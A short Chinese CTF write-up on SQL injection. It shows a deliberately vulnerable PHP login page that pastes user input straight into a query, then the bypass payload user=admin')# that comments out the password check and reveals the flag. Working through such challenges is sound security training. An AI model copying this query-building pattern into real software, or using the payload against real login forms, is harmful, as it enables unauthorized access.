SQL註入1
阿新 • • 發佈:2017-05-29
put com mysq secure name 字符 html mit rom
<html> <head> Secure Web Login </head> <body> <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ‘:‘ . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(SAE_MYSQL_DB); $user = trim($_POST[user]); $pass = md5(trim($_POST[pass])); $sql="select user from ctf where (user=‘".$user."‘) and (pw=‘".$pass."‘)"; echo ‘</br>‘.$sql; $query = mysql_fetch_array(mysql_query($sql)); if($query[user]=="admin") { echo "<p>Logged in! flag:******************** </p>"; } if($query[user] != "admin") { echo("<p>You are not admin!</p>"); } } echo $query[user]; ?> <form method=post action=index.php> <input type=text name=user value="Username"> <input type=password name=pass value="Password"> <input type=submit> </form> </body> <a href="index.phps">Source</a> </html>
trim() 函數移除字符串兩側的空白字符或其他預定義字符。
例如本題雙引號裏面的都被解析了,所以不用閉合(帶雙引號)
直接輸時是這種情況(發生了過濾)
所以我們直接註入
user=admin‘)#&pass=7321
只管user剩下的註釋掉
Logged in! flag:nctf{ni_ye_hui_sql?}
SQL註入1